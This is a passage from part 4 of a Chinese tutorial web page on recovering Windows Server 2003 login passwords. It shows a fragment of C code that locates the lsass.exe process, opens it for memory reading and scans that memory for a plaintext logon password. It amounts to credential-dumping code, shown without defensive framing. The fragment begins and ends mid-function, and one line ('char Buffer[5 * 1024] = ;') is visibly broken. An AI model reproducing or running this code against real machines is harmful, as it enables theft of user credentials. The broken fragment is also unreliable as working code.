在win 2003中三大方法助你得到登陆密码(4) - 万象系统之家

万象系统之家 - 系统光盘下载网站!

当前位置:万象系统之家 > 系统教程 > 在win 2003中三大方法助你得到登陆密码(4)

在win 2003中三大方法助你得到登陆密码(4)

时间:2012-10-26 15:13:49 作者:木木 来源:万象系统之家 1. 扫描二维码随时看资讯 2. 请使用手机浏览器访问: https://m.xitongzhijia.net/xtjc/20121026/17877.html 手机查看 评论

  }

  else

  {

  break;

  }

  }

  return i + 7; // One Flag To Indicate We Find The Password

  }

  }

  }

  return -1; // Well,We Fail To Find The Password,And This Always Happens

  }

  // End Search

  //------------------------------------------------------------------------------------

  // Purpose: To Get The Lsass.exe PID

  // Return Type: DWORD

  // Parameters: None

  //------------------------------------------------------------------------------------

  DWORD GetLsassPID()

  {

  HANDLE hProcessSnap;

  HANDLE hProcess = NULL;

  PROCESSENTRY32 pe32;

  DWORD PID = 0;

  hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

  if( hProcessSnap == INVALID_HANDLE_VALUE )

  {

  printf("Fail To Create Snap Shot\n");

  return 0;

  }

  pe32.dwSize = sizeof(PROCESSENTRY32);

  if( !Process32First(hProcessSnap, &pe32))

  {

  CloseHandle(hProcessSnap); // Must clean up the snapshot object!

  return 0;

  }

  do

  {

  if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)

  {

  PID = pe32.th32ProcessID;

  break;

  }

  }while(Process32Next( hProcessSnap, &pe32));

  CloseHandle( hProcessSnap);

  return PID;

  }

  // End GetLsassPID()

  //------------------------------------------------------------------------------------

  // Purpose: To Find The Password

  // Return Type: BOOLEAN

  // Parameters:

  // In: DWORD PID -> The Lsass.exe's PID

  //------------------------------------------------------------------------------------

  BOOL FindPassword(DWORD PID)

  {

  HANDLE hProcess = NULL;

  char Buffer[5 * 1024] = ;

  DWORD ByteGet = 0;

  int Found = -1;

  hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process

  if (hProcess == NULL)

  {

  printf("Fail To Open Process\n");

  return FALSE;

  }

  if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe

  {

  printf("Fail To Read Memory\n");

发表评论

0

没有更多评论了

评论就这些咯,让大家也知道你的独特见解

立即评论

以上留言仅代表用户个人观点,不代表万象系统之家立场

其他版本软件

热门教程

人气教程排行

服务器系统推荐

本站发布的系统仅为个人学习测试使用,请在下载后24小时内删除,不得用于任何商业用途,否则后果自负,请支持购买微软正版系统!

如侵犯到您的权益,请及时通知我们,我们会及时处理,对系统之家有任何投诉或建议,请与管理员联系. QQ:346231061

Copyright2024 万象系统之家(www.maxdo.tech) 版权所有 沪ICP备2021023961号-5